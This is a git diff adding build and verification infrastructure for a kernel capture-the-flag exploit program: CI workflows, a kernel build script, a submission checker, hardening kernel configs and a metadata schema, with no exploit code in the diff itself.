diff --git a/.github/workflows/kernelctf-auto-releaser.yaml b/.github/workflows/kernelctf-auto-releaser.yaml new file mode 100644 index 00000000..dc83a0a2 --- /dev/null +++ b/.github/workflows/kernelctf-auto-releaser.yaml @@ -0,0 +1,38 @@ +name: kernelCTF auto releaser +on: + workflow_dispatch: + schedule: + - cron: '0 12 * * *' # every day at 12:00 UTC +permissions: {} +defaults: + run: + shell: bash + working-directory: kernelctf +jobs: + get_new_builds: + runs-on: ubuntu-latest + steps: + - name: Checkout repo + uses: actions/checkout@v4 + + - name: Install prerequisites + run: sudo apt install -yq --no-install-recommends python3-lxml + + - id: check + name: Check latest kernel versions + run: ./get_latest_kernel_versions.py + outputs: + releases: ${{ steps.check.outputs.releases }} + + build_release: + needs: get_new_builds + if: fromJSON(needs.get_new_builds.outputs.releases)[0] != null + strategy: + matrix: + release: ${{ fromJSON(needs.get_new_builds.outputs.releases) }} + fail-fast: false # do not cancel other builds + uses: ./.github/workflows/kernelctf-release-build.yaml + secrets: inherit + with: + releaseId: ${{ matrix.release.releaseId }} + branch: ${{ matrix.release.branch }} diff --git a/.github/workflows/kernelctf-release-build.yaml b/.github/workflows/kernelctf-release-build.yaml new file mode 100644 index 00000000..ae8819ed --- /dev/null +++ b/.github/workflows/kernelctf-release-build.yaml @@ -0,0 +1,73 @@ +name: kernelCTF release build +on: + workflow_dispatch: + inputs: + releaseId: + description: 'Release ID' + type: string + required: true + branch: + description: 'Branch, tag or commit' + type: string + required: false + workflow_call: + inputs: + releaseId: + type: string + branch: + type: string +run-name: 'kernelCTF release: ${{inputs.releaseId}}' +permissions: {} +defaults: + run: + shell: bash + working-directory: kernelctf +jobs: + build: + runs-on: ubuntu-latest + steps: + - name: Checkout repo + uses: actions/checkout@v4 + + - name: Check release does not exist yet + run: curl --fail -I https://storage.googleapis.com/kernelctf-build/releases/${{inputs.releaseId}}/bzImage && exit 1 || true + + - name: Install prerequisites + run: sudo apt install -yq --no-install-recommends build-essential flex bison bc ca-certificates libelf-dev libssl-dev cpio pahole + + - name: Build + run: ./build_release.sh ${{inputs.releaseId}} ${{inputs.branch}} + + - name: Show releases + run: find releases -type f|xargs ls -al + + - name: Upload release artifact + uses: actions/upload-artifact@v3 + with: + name: ${{inputs.releaseId}} + path: kernelctf/releases/${{inputs.releaseId}} + if-no-files-found: error + + upload: + runs-on: ubuntu-latest + needs: build + steps: + - name: Download exploit + uses: actions/download-artifact@v3 + with: + name: ${{inputs.releaseId}} + path: ./kernelctf/releases/${{inputs.releaseId}} + + - name: Authenticate to Google Cloud + uses: google-github-actions/auth@v1 + with: + credentials_json: '${{secrets.KERNELCTF_GCS_SA_KEY}}' + + - name: Upload release + uses: 'google-github-actions/upload-cloud-storage@v1' + with: + path: kernelctf/releases/${{inputs.releaseId}} + destination: kernelctf-build/releases + predefinedAcl: publicRead + gzip: false # most of the files are compressed already, do not compress them again + process_gcloudignore: false # removes warnings that .gcloudignore file does not exist diff --git a/.github/workflows/kernelctf-submission-verification.yaml b/.github/workflows/kernelctf-submission-verification.yaml index 02a84290..fb4e4d7d 
100644 --- a/.github/workflows/kernelctf-submission-verification.yaml +++ b/.github/workflows/kernelctf-submission-verification.yaml @@ -21,16 +21,18 @@ jobs: outputs: targets: ${{ steps.check_submission.outputs.targets }} submission_dir: ${{ steps.check_submission.outputs.submission_dir }} + exploits_info: ${{ steps.check_submission.outputs.exploits_info }} + artifact_backup_dir: ${{ steps.check_submission.outputs.artifact_backup_dir }} steps: - run: pip install -U jsonschema - name: Checkout repo content - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: ref: master - name: Checkout PR content - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: path: pr ref: ${{ env.PR_REF }} @@ -56,7 +58,7 @@ jobs: EXPLOIT_DIR: pr/pocs/linux/kernelctf/${{ needs.structure_check.outputs.submission_dir }}/exploit/${{ matrix.target }} steps: - name: Checkout PR content - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: path: pr ref: ${{ env.PR_REF }} @@ -114,9 +116,14 @@ jobs: env: RELEASE_ID: ${{ matrix.target }} SUBMISSION_DIR: ${{ needs.structure_check.outputs.submission_dir }} + EXPLOIT_INFO: ${{ toJSON(fromJSON(needs.structure_check.outputs.exploits_info)[matrix.target]) }} + defaults: + run: + shell: bash + working-directory: ./kernelctf/repro/ steps: - name: Checkout repo content - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: ref: master @@ -133,12 +140,11 @@ jobs: uses: actions/download-artifact@v3 with: name: exploit_${{ env.RELEASE_ID }} - path: exp/ + path: ./kernelctf/repro/exp/ - name: Fetch rootfs run: | - wget https://storage.googleapis.com/kernelctf-build/files/rootfs_repro_v1.img.gz - mv rootfs_repro_v1.img.gz rootfs.img.gz + wget -O rootfs.img.gz https://storage.googleapis.com/kernelctf-build/files/rootfs_repro_v2.img.gz gzip -d rootfs.img.gz - name: Download bzImage @@ -146,66 +152,99 @@ jobs: if [ "$RELEASE_ID" == "mitigation-6.1" ]; then RELEASE_ID="mitigation-6.1-v2"; fi wget https://storage.googleapis.com/kernelctf-build/releases/$RELEASE_ID/bzImage + - name: List repro folder contents + run: ls -alR ./ + # ugly hack to make Github Actions UI to show repro logs separately in somewhat readable fashion - id: repro1 name: Reproduction (1 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 1 + run: ./repro.sh 1 - id: repro2 name: Reproduction (2 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 2 + run: ./repro.sh 2 - id: repro3 name: Reproduction (3 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 3 + run: ./repro.sh 3 - id: repro4 name: Reproduction (4 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 4 + run: ./repro.sh 4 - id: repro5 name: Reproduction (5 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 5 + run: ./repro.sh 5 - id: repro6 name: Reproduction (6 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 6 + run: ./repro.sh 6 - id: repro7 name: Reproduction (7 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 7 + run: ./repro.sh 7 - id: repro8 name: Reproduction (8 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 8 + run: ./repro.sh 8 - id: repro9 name: Reproduction (9 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 9 + run: ./repro.sh 9 - id: repro10 name: Reproduction (10 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 10 + run: ./repro.sh 10 - name: Upload repro QEMU logs as an artifact uses: actions/upload-artifact@v3 with: name: repro_logs_${{ env.RELEASE_ID }} - path: repro_log_*.txt + path: ./kernelctf/repro/repro_log_*.txt - name: Reproduction 
// Summary env: STEPS: ${{ toJSON(steps) }} run: | echo $STEPS >> steps.json - ./kernelctf/repro_summary.py ${{ github.run_id }} + ../repro_summary.py ${{ github.run_id }} + + - name: Upload repro summary as an artifact + uses: actions/upload-artifact@v3 + with: + name: repro_summary_${{ env.RELEASE_ID }} + path: ./kernelctf/repro/repro_summary.md + + backup_artifacts: + runs-on: ubuntu-latest + needs: [structure_check, exploit_build, exploit_repro] + if: always() && needs.structure_check.result == 'success' + steps: + - name: Download artifacts + uses: actions/download-artifact@v3 + with: + path: ./artifacts + + - name: Authenticate to Google Cloud + uses: google-github-actions/auth@v1 + with: + credentials_json: '${{secrets.KERNELCTF_GCS_SA_KEY}}' + + - name: Upload artifacts to GCS + uses: 'google-github-actions/upload-cloud-storage@v1' + with: + path: ./artifacts + destination: kernelctf-build/artifacts/${{ needs.structure_check.outputs.artifact_backup_dir }}_${{ github.run_id }} + parent: false + predefinedAcl: publicRead + process_gcloudignore: false # removes warnings that .gcloudignore file does not exist diff --git a/.gitignore b/.gitignore new file mode 100644 index 00000000..a6a15c24 --- /dev/null +++ b/.gitignore @@ -0,0 +1,3 @@ +pocs/cpus/reptar/minimized/reptar.*.bin +pocs/cpus/reptar/minimized/reptar.*.elf +pocs/cpus/reptar/minimized/reptar.log diff --git a/README.md b/README.md index 7abfc65d..dd7b100b 100644 --- a/README.md +++ b/README.md @@ -41,7 +41,7 @@ security vulnerabilities. | 2021 | Linux: KVM VM_IO\|VM_PFNMAP vma mishandling | [CVE-2021-22543](https://github.com/google/security-research/security/advisories/GHSA-7wq5-phmq-m584) | [PoC](pocs/linux/kvm_vma) | 2021 | BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution | [CVE-2020-24490](https://github.com/google/security-research/security/advisories/GHSA-ccx2-w2r4-x649), [CVE-2020-12351](https://github.com/google/security-research/security/advisories/GHSA-h637-c88j-47wq), [CVE-2020-12352](https://github.com/google/security-research/security/advisories/GHSA-7mh3-gq28-gfrq) | [Write-up](https://google.github.io/security-research/pocs/linux/bleedingtooth/writeup.html), [PoC](pocs/linux/bleedingtooth) -# Licence & Patents +# License & Patents The advisories and patches posted here are free and open source. diff --git a/kernelctf/.gitignore b/kernelctf/.gitignore new file mode 100644 index 00000000..8ad4c342 --- /dev/null +++ b/kernelctf/.gitignore @@ -0,0 +1,4 @@ +.cache/ +__pycache__/ +builds/ +releases/ diff --git a/kernelctf/build_release.sh b/kernelctf/build_release.sh new file mode 100755 index 00000000..2822922c --- /dev/null +++ b/kernelctf/build_release.sh @@ -0,0 +1,108 @@ +#!/bin/bash +set -ex + +usage() { + echo "Usage: $0 (lts|cos|mitigation)-<version> [<branch>]"; + exit 1; +} + +RELEASE_NAME="$1" +BRANCH="$2" + +if [[ !
"$RELEASE_NAME" =~ ^(lts|cos|mitigation)-(.*) ]]; then usage; fi +TARGET="${BASH_REMATCH[1]}" +VERSION="${BASH_REMATCH[2]}" + +case $TARGET in + lts) + REPO="https://github.com/gregkh/linux" + DEFAULT_BRANCH="v${VERSION}" + CONFIG_FN="lts.config" + ;; + cos) + REPO="https://cos.googlesource.com/third_party/kernel" + ;; + mitigation) + REPO="https://github.com/thejh/linux" + case $VERSION in + v3-6.1.55) + DEFAULT_BRANCH="mitigations-next" + CONFIG_FN="mitigation-v3.config" + CONFIG_FULL_FN="mitigation-v3-full.config" + ;; + 6.1 | 6.1-v2) + DEFAULT_BRANCH="slub-virtual-v6.1" + CONFIG_FN="mitigation-v1.config" + ;; + esac ;; + *) + usage ;; +esac + +BRANCH="${BRANCH:-$DEFAULT_BRANCH}" +if [ -z "$BRANCH" ]; then usage; fi + +echo "REPO=$REPO" +echo "BRANCH=$BRANCH" + +BASEDIR=`pwd` +BUILD_DIR="$BASEDIR/builds/$RELEASE_NAME" +RELEASE_DIR="$BASEDIR/releases/$RELEASE_NAME" +CONFIGS_DIR="$BASEDIR/kernel_configs" + +if [ -d "$RELEASE_DIR" ]; then echo "Release directory already exists. Stopping."; exit 1; fi + +mkdir -p $BUILD_DIR 2>/dev/null || true +cd $BUILD_DIR +if [ ! -d ".git" ]; then git init && git remote add origin $REPO; fi + +if ! git checkout $BRANCH; then + git fetch --depth 1 origin $BRANCH:$BRANCH || true # TODO: hack, solve it better + git checkout $BRANCH +fi + +if [ "$TARGET" == "cos" ]; then + rm lakitu_defconfig || true + make lakitu_defconfig + cp .config lakitu_defconfig +else + curl 'https://cos.googlesource.com/third_party/kernel/+/refs/heads/cos-6.1/arch/x86/configs/lakitu_defconfig?format=text'|base64 -d > lakitu_defconfig + cp lakitu_defconfig .config +fi + +# build everything into the kernel instead of modules +# note: this can increase the attack surface! +sed -i s/=m/=y/g .config + +if [ ! -z "$CONFIG_FN" ]; then + cp $CONFIGS_DIR/$CONFIG_FN kernel/configs/ + make $CONFIG_FN +fi + +make olddefconfig + +if [ ! -z "$CONFIG_FN" ]; then + if scripts/diffconfig $CONFIGS_DIR/$CONFIG_FN .config|grep "^[^+]"; then + echo "Config did not apply cleanly." + exit 1 + fi +fi + +if [ ! -z "$CONFIG_FULL_FN" ]; then + if scripts/diffconfig $CONFIGS_DIR/$CONFIG_FULL_FN .config|grep "^[^+]"; then + echo "The full config has differences compared to the applied config. Check if the base config changed since custom config was created." + exit 1 + fi +fi + +make -j`nproc` + +mkdir -p $RELEASE_DIR 2>/dev/null || true + +echo "REPOSITORY_URL=$REPO" > $RELEASE_DIR/COMMIT_INFO +(echo -n "COMMIT_HASH="; git rev-parse HEAD) >> $RELEASE_DIR/COMMIT_INFO + +cp $BUILD_DIR/arch/x86/boot/bzImage $RELEASE_DIR/ +cp $BUILD_DIR/lakitu_defconfig $RELEASE_DIR/ +cp $BUILD_DIR/.config $RELEASE_DIR/ +gzip -c $BUILD_DIR/vmlinux > $RELEASE_DIR/vmlinux.gz diff --git a/kernelctf/check-submission.py b/kernelctf/check-submission.py index 3842ccf4..a0870424 100755 --- a/kernelctf/check-submission.py +++ b/kernelctf/check-submission.py @@ -1,99 +1,21 @@ #!/usr/bin/env -S python3 -u import os -import re -import subprocess import sys import json import jsonschema -import requests -import csv -import io import hashlib +from utils import * PUBLIC_CSV_URL = "https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pub?output=csv" POC_FOLDER = "pocs/linux/kernelctf/" EXPLOIT_DIR = "exploit/" MIN_SCHEMA_VERSION = 2 -DEBUG = "--debug" in sys.argv - -errors = [] -warnings = [] - -def error(msg): - global errors - msg = msg.replace('\n', '\n ') - errors.append(msg) - print(f"\n[!] 
[ERROR] {msg}") - -def warning(msg): - global warnings - msg = msg.replace('\n', '\n ') - warnings.append(msg) - print(f"\n[!] [WARN] {msg}") - -def fail(msg): - print("\n[!] [FAIL] " + msg.replace('\n', '\n ')) - os._exit(1) - -def run(cmd): - try: - result = subprocess.check_output(cmd, shell=True).decode('utf-8').split('\n') - return result if result[-1] != "" else result[0:-1] - except subprocess.CalledProcessError as e: - fail(f"executing '{cmd}' failed with exit code {e.returncode}") - -def subdirEntries(files, subdir): - return list(set([f[len(subdir):].split('/')[0] for f in files if f.startswith(subdir)])) - -def formatList(items, nl=False): - return ('\n' if nl else '').join([f"\n - {item}" for item in items]) - -def printList(title, items): - print(f"\n{title}:" + formatList(items)) - -def errorList(errorMsg, items, warningOnly=False): - itemsStr = ", ".join(f"`{x}`" for x in items) - errorMsg = errorMsg.replace("", itemsStr) if "" in errorMsg else f"{errorMsg}: {itemsStr}" - if warningOnly: - warning(errorMsg) - else: - error(errorMsg) - -def checkOnlyOne(list, errorMsg): - if len(list) > 1: - errorList(errorMsg, list) - return list[0] - -def checkList(items, isAllowedFunc, errorMsg, warningOnly=False): - disallowedItems = [item for item in items if not isAllowedFunc(item)] - if len(disallowedItems) > 0: - errorList(errorMsg, disallowedItems, warningOnly) - return list(sorted(set(items) - set(disallowedItems))) - -def checkAtLeastOne(list, errorMsg): - if len(list) == 0: - fail(errorMsg) - -def checkRegex(text, pattern, errorMsg): - m = re.match(pattern, text) - if not m: - error(f"{errorMsg}. Must match regex `{pattern}`") - return m - -def fetch(url): - response = requests.get(url) - if response.status_code != 200: - fail(f"expected 200 OK for request: {url}") - return response.content.decode('utf-8') - -def parseCsv(csvContent): - columns, *rows = list(csv.reader(io.StringIO(csvContent), strict=True)) - return [{ columns[i]: row[i] for i in range(len(columns)) } for row in rows] +# DEBUG = "--debug" in sys.argv argv = [arg for arg in sys.argv if not arg.startswith("--")] print(f"[-] Argv: {argv}") -mergeInto = argv[1] if len(argv) >= 2 else "origin/main" +mergeInto = argv[1] if len(argv) >= 2 else "origin/master" print(f"[-] Params: mergeInto = {mergeInto}") mergeBase = run(f"git merge-base HEAD {mergeInto}")[0] @@ -149,7 +71,7 @@ def parseCsv(csvContent): schemaVersion = MIN_SCHEMA_VERSION schemaUrl = f"https://google.github.io/security-research/kernelctf/metadata.schema.v{schemaVersion}.json" - schema = json.loads(fetch(schemaUrl)) + schema = json.loads(fetch(schemaUrl, f"metadata.schema.v{schemaVersion}.json")) metadataErrors = list(jsonschema.Draft202012Validator(schema).iter_errors(metadata)) if len(metadataErrors) > 0: @@ -159,13 +81,10 @@ def parseCsv(csvContent): submissionIds = metadata.get("submission_ids", None) or metadata["submission_id"] if isinstance(submissionIds, str): submissionIds = [submissionIds] +submissionIds.sort() print(f"[-] Submission IDs = {submissionIds}") -if DEBUG: - with open("public.csv", "rt") as f: publicCsv = f.read() -else: - publicCsv = fetch(PUBLIC_CSV_URL) - +publicCsv = fetch(PUBLIC_CSV_URL, "public.csv") publicSheet = { x["ID"]: x for x in parseCsv(publicCsv) } # print(json.dumps(publicSheet, indent=4)) @@ -173,6 +92,7 @@ def parseCsv(csvContent): fail(f"submission ID ({submissionId}) was not found on public spreadsheet") submissionIds = list(set(submissionIds).intersection(publicSheet.keys())) +submissionIds.sort() flags = [] for 
submissionId in submissionIds: @@ -193,6 +113,8 @@ def parseCsv(csvContent): if exploitHash != calculated: error(f"Expected `{archiveFn}` with SHA256 hash of `{exploitHash}`, but the file's checksum is `{calculated}`.") + else: + print(f"[+] The hash of the file `{archiveFn}` matches the expected `{exploitHash}` value.") flags.extend(publicData["Flags"].strip().split('\n')) @@ -201,16 +123,12 @@ def parseCsv(csvContent): flagTargets = set([checkRegex(flag, r"kernelCTF\{v1:([^:]+):\d+\}", f"The flag (`{flag}`) is invalid").group(1) for flag in flags]) if "mitigation-6.1-v2" in flagTargets: - flagTargets = flagTargets - set(["mitigation-6.1-v2"]) | set(["mitigation-6.1"]) + flagTargets = flagTargets - {"mitigation-6.1-v2"} | {"mitigation-6.1"} print(f"[-] Got flags for the following targets: {', '.join(flagTargets)}") checkList(flagTargets, lambda t: t in exploitFolders, f"Missing exploit for target(s)") checkList(exploitFolders, lambda t: t in flagTargets, f"Found extra exploit(s) without flag submission", True) - -def ghSet(varName, content): - varName = f"GITHUB_{varName}" - print(f"[+] Writing {json.dumps(content)} to ${varName}") - if varName in os.environ: - with open(os.environ[varName], 'at') as f: f.write(content + "\n") +if schemaVersion >= 3: + checkList(flagTargets, lambda t: t in metadata["exploits"].keys(), f"Missing metadata information for exploit(s)") def summary(success, text): if warnings: @@ -222,8 +140,17 @@ def summary(success, text): if len(errors) > 0: summary(False, f"The file structure verification of the PR failed with the following errors:\n{formatList([f'❌ {e}' for e in errors], True)}") -ghSet("OUTPUT", "targets=" + json.dumps([f for f in exploitFolders if not f.startswith("extra-")])) +ghSet("OUTPUT", "targets=" + json.dumps([f for f in flagTargets])) ghSet("OUTPUT", f"submission_dir={subDirName}") +exploits_info = {} +for target in flagTargets: + if schemaVersion >= 3: + exploit_info = metadata["exploits"].get(target) + if not exploit_info: continue + exploits_info[target] = { key: exploit_info[key] for key in ["uses", "requires_separate_kaslr_leak"] if key in exploit_info } +ghSet("OUTPUT", f"exploits_info={json.dumps(exploits_info)}") +ghSet("OUTPUT", f"artifact_backup_dir={'_'.join(submissionIds)}") + summary(True, f"✅ The file structure verification of the PR was successful!") diff --git a/kernelctf/get_latest_kernel_versions.py b/kernelctf/get_latest_kernel_versions.py new file mode 100755 index 00000000..d694374e --- /dev/null +++ b/kernelctf/get_latest_kernel_versions.py @@ -0,0 +1,35 @@ +#!/usr/bin/env -S python3 -u +import json +from utils import * +from lxml import etree + +releases = [] + +def add_release(release_id, branch=None): + url = f"https://storage.googleapis.com/kernelctf-build/releases/{release_id}/bzImage" + status_code = requests.head(url).status_code + if status_code == 200: + print(" -> Release already exists, skipping...") + return + if status_code != 403: + fail(f"Unexpected HTTP status code for release check: {status_code} (url = {url})") + + global releases + releases.append({ "releaseId": release_id, "branch": branch }) + +latest_lts = run("git ls-remote --tags --sort='-v:refname' https://github.com/gregkh/linux 'v6.1.*[0-9]'")[0].split("refs/tags/")[1] +print(f"Latest LTS: {latest_lts}") +add_release(f"lts-{latest_lts[1:]}") + +for cos_milestone in [97, 105]: + release_notes = fetch(f"https://cloud.google.com/feeds/cos-{cos_milestone}-release-notes.xml") + tree = etree.XML(release_notes.encode('utf-8')) + entries = 
tree.xpath("//*[local-name() = 'content']/text()") + latest_entry = entries[0] + version_tuple = checkOnlyOne(list(set(re.findall(f"cos-{cos_milestone}-(\d+)-(\d+)-(\d+)", latest_entry))), "too many versions were found") + release_id = f"cos-{cos_milestone}-{'.'.join(version_tuple)}" + commit = checkOnlyOne(re.findall("https://cos.googlesource.com/third_party/kernel/\+/([0-9a-f]{40})", latest_entry), "multiple commits were found") + print(f"Latest COS {cos_milestone}: {release_id}, commit = {commit}") + add_release(release_id, commit) + +ghSet("OUTPUT", "releases=" + json.dumps(releases)) diff --git a/kernelctf/kernel_configs/lts.config b/kernelctf/kernel_configs/lts.config new file mode 100644 index 00000000..88360512 --- /dev/null +++ b/kernelctf/kernel_configs/lts.config @@ -0,0 +1,2 @@ +# CONFIG_IO_URING is not set +CONFIG_SYSTEM_TRUSTED_KEYS="" diff --git a/kernelctf/kernel_configs/mitigation-v1.config b/kernelctf/kernel_configs/mitigation-v1.config new file mode 100644 index 00000000..dc0e1158 --- /dev/null +++ b/kernelctf/kernel_configs/mitigation-v1.config @@ -0,0 +1,12 @@ +# CONFIG_IO_URING is not set +CONFIG_SYSTEM_TRUSTED_KEYS="" + +## required by CONFIG_SLAB_VIRTUAL +CONFIG_DEBUG_VIRTUAL=y + +## required by CONFIG_KMALLOC_SPLIT_VARSIZE +# CONFIG_SLAB_MERGE_DEFAULT is not set + +## turns on Jann's hardening +CONFIG_KMALLOC_SPLIT_VARSIZE=y +CONFIG_SLAB_VIRTUAL=y diff --git a/kernelctf/kernel_configs/mitigation-v3-full.config b/kernelctf/kernel_configs/mitigation-v3-full.config new file mode 100644 index 00000000..a916c33e --- /dev/null +++ b/kernelctf/kernel_configs/mitigation-v3-full.config @@ -0,0 +1,113 @@ +################### General hardening ########################################## + +# Panic instead of failing gracefully and printing a warning when detecting data +# corruption (e.g. in list debugging and SLAB_VIRTUAL) +CONFIG_BUG_ON_DATA_CORRUPTION=y +# Check linked lists for corruption. Must be enabled together with +# CONFIG_BUG_ON_DATA_CORRUPTION. 
+CONFIG_DEBUG_LIST=y +# Prevent overflows and other overwrites in copy_from/to_user +CONFIG_HARDENED_USERCOPY=y +# Detect some buffer overflows in strcpy/memcpy +CONFIG_FORTIFY_SOURCE=y +# Sets kernel.dmesg_restrict to 1 by default +CONFIG_SECURITY_DMESG_RESTRICT=y +# Prevent processes belonging to the same (unprivileged) user from ptracing each +# other except for parents ptracing their children +CONFIG_SECURITY_YAMA=y +# Zero stack frames on function entry, makes some uninitialized variable uses +# unexploitable +CONFIG_INIT_STACK_ALL_ZERO=y +# Print a warning if there are WX mappings at boot +CONFIG_DEBUG_WX=y +# Stack canaries +CONFIG_STACKPROTECTOR=y +CONFIG_STACKPROTECTOR_STRONG=y +# Guard pages for kernel stacks +CONFIG_VMAP_STACK=y +# Randomize the offset of data on the kernel stack in syscalls +CONFIG_RANDOMIZE_KSTACK_OFFSET=y +CONFIG_RANDOMIZE_KSTACK_OFFSET_DEFAULT=y +# Text KASLR +CONFIG_RANDOMIZE_BASE=y +# Other KASLR +CONFIG_RANDOMIZE_MEMORY=y +# Enforce W^X in the kernel +CONFIG_STRICT_KERNEL_RWX=y +CONFIG_STRICT_MODULE_RWX=y +# Enable UMIP on the CPU to prevent using sidt/sgdt in userspace to leak kernel +# pointers (if the CPU supports UMIP) +CONFIG_X86_UMIP=y + +################### CPU side channels ########################################## + +# Meltdown mitigation +CONFIG_PAGE_TABLE_ISOLATION=y +# Spectre mitigations +CONFIG_RETPOLINE=y +CONFIG_CPU_IBPB_ENTRY=y +CONFIG_CPU_IBRS_ENTRY=y + +################### Memory allocator ########################################### + +# SLUB because SLAB_VIRTUAL doesn't support SLAB or SLOB and those are +# deprecated anyway +CONFIG_SLUB=y +# Randomize the order of the freelist when a new slab is created +CONFIG_SLAB_FREELIST_RANDOM=y +# Prevent attacks on the SLUB freelists +CONFIG_SLAB_FREELIST_HARDENED=y +# Don't merge slab caches (makes random caches/varsize useless and cross-cache easier) +CONFIG_SLAB_MERGE_DEFAULT=n +# Allocate msg_msg and some other useful objects in separate -cg caches +CONFIG_CGROUPS=y +CONFIG_MEMCG=y + +################### BPF ######################################################## + +# Allow sandboxing with seccomp +CONFIG_SECCOMP=y +CONFIG_SECCOMP_FILTER=y +# This is required for jitting seccomp filters (probably) +CONFIG_BPF_SYSCALL=y +# Remove Spectre gadgets in the BPF interpreter +CONFIG_BPF_JIT=y +CONFIG_BPF_JIT_ALWAYS_ON=y +# Makes the kernel.unprivileged_bpf_disabled default to 2 +CONFIG_BPF_UNPRIV_DEFAULT_OFF=y + +################### Attack surface reduction ################################### + +# Disable io_uring +CONFIG_IO_URING=n +# Prevent attackers from stopping the kernel inside copy_from/to_user +CONFIG_USERFAULTFD=n +CONFIG_FUSE_FS=n +# Disable staging drivers, which may be more buggy +CONFIG_STAGING=n + +################## Extra mitigations/not upstreamed ############################ + +# Protects against cross-cache attacks. 
Must be enabled together with +# CONFIG_BUG_ON_DATA_CORRUPTION +CONFIG_SLAB_VIRTUAL=y +# Splits kmalloc caches in fixed-size and dynamic size to make UaF exploitation +# harder +CONFIG_KMALLOC_SPLIT_VARSIZE=y +# Create multiple copies of the normal and -cg kmalloc caches to make spraying +# harder +CONFIG_RANDOM_KMALLOC_CACHES=y + +################### Make the kernel less annoying to debug ##################### + +# Compile the kernel with debug info +CONFIG_DEBUG_INFO_DWARF_TOOLCHAIN_DEFAULT=y +# Have all symbols in kallsyms +CONFIG_KALLSYMS=y +CONFIG_KALLSYMS_ALL=y +CONFIG_TRIM_UNUSED_KSYMS=n +# Include the kernel configuration in the bzImage/vmlinux +CONFIG_IKCONFIG=y +CONFIG_IKCONFIG_PROC=y +# SLUB stats in /sys/slab +CONFIG_SLUB_DEBUG=y diff --git a/kernelctf/kernel_configs/mitigation-v3.config b/kernelctf/kernel_configs/mitigation-v3.config new file mode 100644 index 00000000..11dd6752 --- /dev/null +++ b/kernelctf/kernel_configs/mitigation-v3.config @@ -0,0 +1,25 @@ +# CONFIG_IO_URING is not set +CONFIG_SYSTEM_TRUSTED_KEYS="" + +## required by CONFIG_KMALLOC_SPLIT_VARSIZE +# CONFIG_SLAB_MERGE_DEFAULT is not set + +## turns on our mitigations +CONFIG_KMALLOC_SPLIT_VARSIZE=y +CONFIG_SLAB_VIRTUAL=y + +## turns on CONFIG_RANDOM_KMALLOC_CACHES +CONFIG_RANDOM_KMALLOC_CACHES=y + +## turns on additional hardenings +CONFIG_BUG_ON_DATA_CORRUPTION=y +CONFIG_FORTIFY_SOURCE=y +CONFIG_DEBUG_WX=y +CONFIG_BPF_UNPRIV_DEFAULT_OFF=y +# CONFIG_FUSE_FS is not set + +### Make the kernel less annoying to debug ## Compile the kernel with debug info +CONFIG_DEBUG_INFO_DWARF_TOOLCHAIN_DEFAULT=y +# Have all symbols in kallsyms +CONFIG_KALLSYMS_ALL=y diff --git a/kernelctf/metadata.schema.v3.json b/kernelctf/metadata.schema.v3.json new file mode 100644 index 00000000..c56374db --- /dev/null +++ b/kernelctf/metadata.schema.v3.json @@ -0,0 +1,105 @@ +{ + "$id": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "$schema": "https://json-schema.org/draft/2020-12/schema", + "title": "kernelCTF submission metadata", + "type": "object", + "required": ["$schema", "submission_ids", "vulnerability", "exploits"], + "properties": { + "$schema": { + "const": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json" + }, + "submission_ids": { + "description": "Identifier(s) of the submission(s). Can be found on the public kernelCTF spreadsheet (https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pubhtml?gid=2095368189) after a valid flag was submitted via the submission form.", + "type": "array", + "uniqueItems": true, + "items": { + "type": "string", + "pattern": "^exp[0-9]+$" + } + }, + "vulnerability": { + "type": "object", + "required": ["patch_commit", "cve", "affected_versions", "requirements"], + "properties": { + "summary": { + "type": "string", + "description": "Short, one line summary of the vulnerability" + }, + "patch_commit": { + "type": "string", + "pattern": "^https://git.kernel.org/pub/scm/linux/kernel/git/(torvalds|stable)/linux.git/commit/" + }, + "cve": { + "type": "string", + "pattern": "^CVE-[0-9]{4}-[0-9]{4,5}$" + }, + "affected_versions": { + "description": "Linux kernel versions affected by the vulnerability, inclusive range.", + "type": "array", + "uniqueItems": true, + "items": { + "type": "string", + "pattern": "^[0-9]+(\\.[0-9]+)+(-rc[0-9]+)?
- [0-9]+(\\.[0-9]+)+(-rc[0-9]+)?$" + } + }, + "requirements": { + "type": "object", + "required": ["attack_surface", "capabilities", "kernel_config"], + "properties": { + "attack_surface": { + "type": "array", + "uniqueItems": true, + "items": { + "enum": ["userns", "io_uring"] + } + }, + "capabilities": { + "type": "array", + "uniqueItems": true, + "items": { + "type": "string", + "pattern": "^CAP_" + } + }, + "kernel_config": { + "type": "array", + "uniqueItems": true, + "items": { + "type": "string", + "pattern": "^CONFIG_" + } + } + } + }, + "syzkaller_reference": { + "pattern": "^https://syzkaller.appspot.com/" + } + } + }, + "exploits": { + "type": "object", + "additionalProperties": false, + "patternProperties": { + "^((lts-[0-9]+.[0-9]+(\\.[0-9]+)?)|(mitigation-[0-9]+\\.[0-9]+(\\.[0-9]+)?)|(cos-[0-9]{2,}-[0-9]+\\.[0-9]+\\.[0-9]+)|extra-.*)$": { + "type": "object", + "required": ["uses", "requires_separate_kaslr_leak", "stability_notes"], + "properties": { + "uses": { + "type": "array", + "uniqueItems": true, + "items": { "enum": ["userns", "io_uring"] } + }, + "requires_separate_kaslr_leak": { + "type": "boolean", + "description": "Whether the exploit requires a separate KASLR leak or KASLR bruteforce." + }, + "stability_notes": { + "type": "string", + "description": "Notes on the stability of the exploit: what percentage of runs gets the flag, or how many times the exploit needs to be run on average to get the flag (e.g. 